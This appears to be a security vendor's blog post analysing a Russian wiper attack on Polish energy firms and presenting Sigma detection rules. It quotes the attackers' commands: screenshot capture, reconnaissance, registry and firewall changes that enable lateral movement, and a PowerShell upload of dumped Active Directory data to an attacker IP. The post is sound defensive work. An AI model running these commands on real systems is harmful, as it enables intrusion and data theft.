top of page

Detection improvements based on Russian APT Attacks on Energy Sector in Poland

  • 4 days ago
  • 4 min read

On 29th of December 2025 a destructive wiper-attack was carried out towards the energy sector in Poland.

This included companies operating:


  • Wind and solar farms

  • Manufacturing plants

  • Heat and power plants


The Polish CERT released a report on their investigations the 30th of January [1] and our security analysts investigated the report to understand the attack methodology and locate opportunities to improve our detection capabilities for similar attacks.


Based on the insights gained from the report new Sigma rules were created and published on official SamurAI Sigma Rules Repository as well as having been deployed within NTT’s Hunting engine. 

The following sections walkthrough the attack more in depth as well as describe the created Sigma rules.


Entry vector

The Polish cert reports that in each incident the entry vector were FortiGate devices exposing VPN without 2fa authentication enforcement. Additionally, some of the devices had in the past been running vulnerable versions which may have been facilitated as entry vector.


fortinet login window
Figure 1: The image shows an example of an exposed Fortigate Login

Wiper deployments

The attacks utilized a varied toolset which included uploading corrupted firmware versions to Hitachi Remote Terminal Units (RTU) causing device reboot loops.


photo from CERT Polska comparing firmware
Figure 2: Image snippet from the CERT Polska report shows comparison between legitimate firmware on the left and corrupted firmware on the right which was deployed by the attacker.
Image of Hitachi RTU560
Figure 3: Image of Hitachi RTU560 from Hitachi Energy website [2]

Besides deploying corrupted firmwares the attacker also executed wiper malwares designed to corrupt Windows machines.


Strengthening defense against the attack

The attacks were detected thanks to EDR deployments within the organization and it is our security analysts assessment that similar attacks towards our customer-base would be detected and defended from if a combination of EDR solutions and Network logs are deployed.


However, based on the intelligence in the report the additional Sigma detection rules were created to strengthen our defenses further, these are:


  • NirCmd savescreenshot execution (NTT-990833990)

  • Multiple lolbins executed from cmd.exe (NTT-822258637)

  • Powershell New-ItemProperty Enable Administrative Shares (NTT-130524096)

  • Powershell New-NetFirewallRule Suspicious Locally Allowed Port (NTT-487769391)

  • Powershell Invoke-RestMethod File Upload (NTT-4205756490)


All of the rules are available on the SamurAI Sigma Rules Repository [3].


The following subsections contains descriptions on what attacker activity the rules are designed to detect.


NirCmd used during reconnaissance

The attacker executed through PsExec the Windows Command Line tool NirCmd to take screenshots throughout the environment:

nircmd.exe "savescreenshot C:\Windows\Temp\imagetmp.png"

Our security analysts created the following Sigma Rule to detect usage of NirCmd with savescreenshot feature:


title: NirCmd savescreenshot execution
description: Execution of NirCmd screenshot feature observed in OT intrusions by Russian APT groups
references:
- https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf
- https://www.nirsoft.net/utils/nircmd.html
status: stable
date: 2026-02-04
modified: 2026-02-04
logsource:
category: process_creation
product: windows
detection:
selection:
image|endswith:
- \nircmd.exe
command|contains: savescreenshot
condition: selection
falsepositives:
- Legitimate usage of NirCmd
level: medium

Lolbins execution to fetch system information

The attackers also executed multiple lolbins to gather system information:

cmd.exe /c "tasklist > C:\Windows\TEMP\outlog.txt && netstat -nao >> C:\Windows\TEMP\outlog.txt && netstat -r >> C:\Windows\TEMP\ outlog.txt && arp -a >> C:\Windows\TEMP\outlog.txt && dir /s /b C:\ Users >> C:\Windows\TEMP\outlog.txt"

Our security analysts created a Sigma Rule to detect execution of multiple lolbins with cmd.exe:

title: Multiple lolbins executed from cmd.exe
description: 'Execution of tasklist and at least one more lolbin, all executed from the same cmd.exe command with a piped result. This behavior was observed in the Russian APT attack on Polish OT-Infrastructure'
references:
- https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf
status: stable
date: 2026-02-11
modified: 2026-02-11
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    image|endswith: \cmd.exe
    command|contains|all:
      - '/c'
      - '>>'
      - '&&'
  tool_tasklist:
    command|contains: tasklist
  tool_netstat:
    command|contains: netstat
  tool_arp:
    command|contains: "arp "
  tool_dir:
    command|contains: "dir "
  condition: selection and tool_tasklist and (tool_netstat or tool_arp or tool_dir)
falsepositives:
  - Legitimate execution of tools
level: medium

Enabling administrative shares

The following PowerShell commands were executed to enable administrative shares to enable lateral movement:

New-ItemProperty -Path 'HKLM:\SYSTEM\ CurrentControlSet\Services\LanmanServer\Parameters' -Name 'AutoShareWks' -Value 1 -PropertyType DWord -Force New-ItemProperty -Path 'HKLM:\SYSTEM\ CurrentControlSet\Services\LanmanServer\Parameters' -Name 'AutoShareServer' -Value 1 -PropertyType DWord -Force

The following Sigma rule was implemented to detect the activity:

title: Powershell New-ItemProperty Enable Administrative Shares
description: Usage of New-ItemProperty to enable administrative shares. This behavior was observed in the Russian APT attack on Polish OT-Infrastructure.
references:
- https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty
status: stable
date: 2026-02-12
modified: 2026-02-12
logsource:
  product: windows
  category: ps_script
detection:
  selection:
    script_block|contains|all:
    - New-ItemProperty
    - HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
    - -Value 1
    script_block|contains:
    - AutoShareWks
    - AutoShareServer
  condition: selection
falsepositives:
- Legitimate administrative activity
level: medium

Adding Windows Firewall Rule

The following Powershell commands were executed to enable communicating over SMB protocol to enable lateral movement:

New-NetFirewallRule -Name 'Microsoft Update' -DisplayName 'Microsoft Update' -Protocol TCP -LocalPort 445 -Action Allow

The following Sigma rule was implemented to detect similar additions of new suspicious firewall rules:


title: Powershell New-NetFirewallRule Suspicious Locally Allowed Port
id: 337134fa-b455-470c-a345-a29d93399da3
description: Usage of New-NetFirewallRule to create local firewall opening for suspicious port. This behavior was observed in the Russian APT attack on Polish OT-Infrastructure.
references:
- https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf
- https://learn.microsoft.com/en-us/powershell/module/netsecurity/new-netfirewallrule
status: stable
author: Axel Olsson
date: 2026-02-12
modified: 2026-02-12
logsource:
  product: windows
  category: ps_script
detection:
  selection_1:
    script_block|contains|all:
    - New-NetFirewallRule
    - -Name
    - -DisplayName
    - -LocalPort
    - Allow
  selection_2:
    script_block|contains:
    - '445'
    - '3389'
  condition: selection_1 and selection_2
falsepositives:
- Legitimate Firewall Rule
level: medium

Exfiltrating Active Directory database and Registry Hives external IP

The following powershell command was executed to exfiltrate dumped Active Directory database and Registry Hives to an external hacker controlled IP:


Invoke-RestMethod -Uri http://31.172.71[.]5:50443 -Method Post -InFile .\kkk.zip

The following Sigma rule were implemented to detect the activity:


title: Powershell Invoke-RestMethod File Upload
description: Usage of Invoke-RestMethod to upload a file. This behavior was observed
  in the Russian APT attack on Polish OT-Infrastructure.
references:
- https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-restmethod
status: stable
date: 2026-02-12
modified: 2026-02-12
logsource:
  product: windows
  category: ps_script
detection:
  selection:
    script_block|contains|all:
    - -Invoke-RestMethod
    - -Uri http
    - -Method Post
    - -InFile 
  condition: selection
falsepositives:
- Legitimate use of Invoke-RestMethod
level: medium

References


 
 
bottom of page